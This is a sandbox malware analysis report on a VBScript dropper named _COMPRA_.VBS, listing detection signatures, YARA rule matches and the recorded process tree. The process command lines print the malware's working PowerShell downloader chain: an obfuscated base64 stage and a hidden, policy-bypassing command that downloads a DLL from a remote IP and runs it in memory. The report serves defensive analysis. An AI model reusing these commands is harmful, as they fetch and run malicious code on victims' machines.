Windows
Analysis Report
_COMPRA_.VBS
Overview
General Information
Detection
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Generic Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 6256 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\_COMPRA_.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 6388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwBuAG???AdwAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AaABnAH???AdQByAHQAdAAvADEANwAxAC4AOAAxAC4AMwAzADEALgA1ADkAMQAvAC8AOgBwAHQAdABoACcAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6520 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/new.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.hguurtt/171.81.331.591//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 6728 cmdline: powershell Copy-Item -Path C:\Windows\Temp\*.vbs -Destination C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
- cleanup
No configs have been found
Rule | Description | Author
---|---|---
SUSP_Reversed_Base64_Encoded_EXE | Detects a base64 encoded executable with reversed characters | Florian Roth
PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen
No Sigma rule has matched
No Snort rule has matched
AV Detection
- Source: Virustotal
- Source: Avira URL Cloud
- Source: Binary string
- Source: File opened

Networking
- Source: File source
- Source: Bad PDF prefix